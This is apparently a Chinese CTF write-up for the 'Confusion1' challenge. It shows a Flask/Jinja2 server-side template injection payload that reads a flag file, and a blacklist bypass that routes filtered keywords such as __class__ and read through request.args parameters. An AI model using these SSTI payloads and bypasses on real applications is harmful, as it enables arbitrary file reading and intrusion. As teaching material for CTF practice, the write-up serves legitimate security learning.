Web(Confusion1)

最新推荐文章于 2024-06-15 13:16:17 发布
最新推荐文章于 2024-06-15 13:16:17 发布
阅读量1k 收藏
点赞数
分类专栏: CTF(攻防世界) 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/123448720
版权

某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)

题目场景:

(1)在登陆页面出现flag字段。

 本题目可能存在Python SSTI漏洞,类似于web(easytornado)。

SSTI知识:python-flask-ssti(模版注入漏洞)_新博客www.husins.cn的博客-CSDN博客_flask注入

(2)测试是否存在模板注入。

(3) 构造常规的payload读取flag文件。

{{''.__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

读取失败,说明系统经过了过滤,经过尝试,发现系统过滤了常用的class、subclass、read等关键方法,但是并未过滤request。

request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) " 。

所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。

沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程。其实就是闯过重重黑名单,最终拿到系统命令执行权限的过程。沙箱逃逸:SSTI/沙盒逃逸详细总结 - 安全客,安全资讯平台

将前面构造的payload,按照request.args置换之前会过滤的字段,以后遇到类似的情况,可以按照这个方法构造:{{request.args.a,request.args.b}}?a=xxxx&b=xxxxx

a=__class__

b=__mro__

c=__subclasses__

d=read

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

flag出现!!!!

BRAVE_YAYA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
confusion-react:React Web应用程序
04-07
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
conFusion:前端Web UI框架引导项目
03-08
conFusion:前端Web UI框架引导项目
【国庆活动】攻防世界(web四)
weixin_51387754的博客
10-09 379
攻防世界是一群信息安全大咖共同研究的答题、竞赛、以游戏方式结合的一款新型学习平台,融入多种场景在线题型,集实战、理论、趣味于一体。
探索 `fusion`:一个现代Web开发的强大框架
gitblog_00030的博客
04-06 424
探索 fusion:一个现代Web开发的强大框架 项目地址:https://gitcode.com/kenneycode/fusion 项目简介 在快速发展的Web开发领域中,KenneyCode 提供了一个名为 Fusion 的创新性框架。这个项目旨在简化复杂的前端开发流程,提供一套整的工具链和组件库,以帮助开发者构建高性能、响应式且易于维护的Web应用。 技术分析 Fusion的核心特性在于...
攻防世界web进阶区 Confusion1
akxnxbshai的博客
01-24 3595
攻防世界web进阶区 Confusion1 难度系数: 四星 题目来源: XCTF 4th-QCTF-2018 题目描述:某天,Bob:PHP是最好的语言,但是Alice不赞同。所以Alice了这个网站证明。在她还没有的时候,我发现其存在问题。(请不要使用扫描器) 题目提到了php,打开网址首先看到一张图 蛇缠在大象身上猜测此系统使用了php+python (php的标志是大象,Python的标志是蛇) 然后进入了注册页面发现flag的位置 想到了本题可能存在Python ..
Alice和Bob的故事 - 非对称加密(转自:简书賈小強)
思念殇千寻的博客
12-14 6152
  参考资料:   https://www.jianshu.com/p/4389ec7ed1c2?from=singlemessage   https://www.chainnews.com/articles/256374834707.htm   在密码学课上经常能听到两个耳熟能详的名字:Alice和Bob。这个两个名字常见到几乎所有和密码学有关的文献都有他们二人的身影。好奇地百度了以下...
攻防世界Confusion1
qq_43774856的博客
12-09 766
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界 WEB Confusion1
qq_41696858的博客
08-26 159
这题其实跟php没关系,不要被hint给骗了,扫一波目录,就知道其实是用python开发的 emmm。。。找了一圈,没发现有什么有用的东西,看目录结构,盲猜是flask 既然是flask,之前做了好多SSTI,那么就试试,果然 {{7*7}}回显49,确实存在ssti 这题的主要考点其实是过SSTI的过滤,经测试,直接''.__class__被过滤了 需要换成{{''[request.args.a]}}?a=__class__其实就跟sql预处理差不多,做一个占位符,然后执行的时候通过参数具体赋值 既然找到
攻防世界 web confusion1
beihai2013
01-18 146
Confusion1 考察:SSTI 参考 https://www.cnblogs.com/zhengna/p/13964561.html 进入网页,发现除了主页面,login和register都登不进去。 显示apache2.4.10,查询是否有相关可利用漏洞,失败。 根据wp,login.php和register.php下均有提示flag位置(!!!一定要查看源码,不能访问的页面也要查看 在URL上测试 http://220.249.52.134:45205/index.php/{{ 1+1}} 返回
confusion-bootstrap-4:前端Web UI框架和工具课程中的餐厅网站
05-11
confusion-bootstrap-4 前端Web UI框架和工具:Bootstrap 4课程中的餐厅网站 课程:
confusion.react:Cousera {使用React进行前端Web开发}
03-30
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
confusion-client-react:用React,JavaScript和Bootstrap在餐厅Web应用程序的客户端开发
05-22
用React,JavaScript和Bootstrap在餐厅Web应用程序的客户端开发 使用React创建一个新项目 在您的React应用程序中创建React组件 开发一个基于React路由器的导航到React应用程序中的各种视图 使用React路由器支持开发...
python安装flaskflask框架,使用静态文件、模板、get和post请求
qq_34631220的博客
06-11 567
模板文件存储的文件夹,可以不传,默认为 templates。静态文件存储的文件夹,可以不传,默认为 static。1.创建app.py文件。2.静态文件和模板使用。
基于Python+Flask+MySQL+HTML的B站数据可视化分析系统
k54kdk的博客
06-15 608
主页登录页面,用户打开浏览器并访问系统的登录页面,可以看到主要功能包括:用户登录:通过输入用户名和密码登录系统。创建新用户:提供跳转链接,允许新用户注册账号。UP主数据查看,查看各个UP主的视频个数以及评论个数的信息,对最多个数的进行排名,查看播放量,作者列表,最火评论搜索UP信息,显示搜索结果搜索结果B站作者分析查看UP详情页面,可以查看第一个UP主的简介,视频等信息。UP主的简介B站作者分析页面,主要包含以下几个部分:首先是作者粉丝量关系图,它展示了不同粉丝数量的作者分布情况;
利用flask + pymysql监测数据同步中的数据是否
qq969887453的博客
06-11 442
最近项目搞重构,将原有的系统拆分成了多个子系统。但是有数据表需要在不同系统中数据,同时为了解决项目性能最了一个很简单的方案,就是公共数据存在每个系统之中。分析这些表,这些表相比源数据表,表结构全相同,除了名称加了MD前缀。/msp/api/download/ GET。参数:target_db_name 需要检查的数据库名称。target_db 目标数据库名称。tables 需要检查的表。参数:source_db 源数据库名称。2、自定义检查系统表数据。
Flask基础2-Jinja2模板
m0_73426548的博客
06-12 953
jinja2模板,jinja2继承,flask基础,flask学习
如何优化Flask-Report报表的性能和加载速度
最新发布
eclipsercp的博客
06-15 509
报表生成是Web应用中的关键功能,但随着应用规模的扩大,性能和加载速度可能成为瓶颈。通过上述策略,我们可以有效地优化Flask-Report报表的性能和加载速度,提供更流畅的用户体验。记住,优化是一个持续的过程,需要根据具体情况进行调整和改进。
Confusion matrix
04-01
A confusion matrix is a table used to evaluate the performance of a classification model. It summarizes the predicted and actual classifications of a dataset and provides a breakdown of the number of true positives, true negatives, false positives, and false negatives. The matrix is often used to calculate metrics such as accuracy, precision, recall, and F1 score, which help determine the model's effectiveness. The confusion matrix is a useful tool for analyzing the performance of various machine learning algorithms and making decisions about model improvements.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值